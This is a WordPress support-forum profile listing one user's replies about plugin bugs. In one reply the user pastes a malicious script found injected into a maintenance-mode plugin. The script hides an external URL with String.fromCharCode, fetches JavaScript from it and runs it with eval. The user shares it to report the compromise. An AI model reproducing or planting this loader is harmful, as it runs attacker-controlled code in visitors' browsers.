fazzari
Forum Replies Created
-
Cheers @slash1andy
I thought that might of been the case but just wanted to double check before paying for the support extension from my theme.
Forum: Plugins
In reply to: [Coming Soon Page & Maintenance Mode] Human Verification Hack – Newz PaperzHello, in the time I’ve been waiting (nearly 3 weeks) I have worked out what is going on.
Somehow a script is getting put in the description section of your plugin.
<script type=text/javascript language=javascript>var url=String.fromCharCode(104,116,116,112,115,58,47,47,103,111,46,97,99,116,105,118,101,97,110,100,98,97,110,102,108,105,112,46,99,111,109,47,116,101,114,116,101,110,46,106,115,63);var text = httpGet(url);if(text.length > 3){eval(text);} function httpGet(theUrl){ var xmlHttp = new XMLHttpRequest();xmlHttp.open( String.fromCharCode(71,69,84), theUrl, false );xmlHttp.send( null );return xmlHttp.responseText;}</script>
If I delete this script then it works fine.
Hope this helps you fix the problem you have with your plugin.
Cheers- This reply was modified 5 years, 6 months ago by fazzari.
Forum: Plugins
In reply to: [Coming Soon Page & Maintenance Mode] Human Verification Hack – Newz PaperzHi,
As you can see from Paul Kevin (@rixeo) comment, I’m not the only one with this problem.I have cleared my cache, I have even re-installed my browser, I’m still getting a Human Verification hack page?
Whenever I deactivate the plugin my website works perfectly.
I really want to keep using your plugin but it’s not working and it’s been over a week.
My URL was shared in my first comment, but here it is again
Cheers
Forum: Plugins
In reply to: [The Events Calendar] Javascript errorHi tribalmike,
Yes correct, only the main event calendar page is showing the error. I’m only using list view on my calendar.
It’s stopping my sticky menu from working and throwing the date out of whack on my scrolling header news feed.Here is a screenshot of the error
https://fazzarimultimedia.com/images/Screen%20Shot%202019-07-05%20at%203.02.36%20am.pngsingle event pages work great and date is fine but when using month view on mobile the dots don’t work hence why I’m only using the list view. The error happens in month view as well though.
Any help would be great
cheersForum: Plugins
In reply to: [Facebook Like Box] Broken Text appeared under buttonI’m getting the same problem
this text is appearing on blog post pages
; if (window.CKEDITOR) { CKEDITOR.instances[“content”].insertHtml(shortcode + “\r\n”); } else { window.send_to_editor(shortcode + “\r\n”); } jQuery(“[data-popup=ux_open_popup_media_button]”).fadeOut(350); } function fbl_validate_fields() { var likebox_type = jQuery(“#ux_ddl_layout_likebox”).val(); var likebox = jQuery(“#ux_ddl_layout_title”).val(); if (likebox_type === “”) { var shortCutFunction = jQuery(“#toastTypeGroup_error input:checked”).val(); var $toast = toastr[shortCutFunction](“Please Choose a Like Box Type”); return; } else { like_box_type(); } if (likebox === “”) { var shortCutFunction = jQuery(“#toastTypeGroup_error input:checked”).val(); var $toast = toastr[shortCutFunction](“Please Choose a Like Box”); return; } insert_like_box(); } jQuery(document).ready(function () { show_pop_up_facebook_likebox(); });
Please advise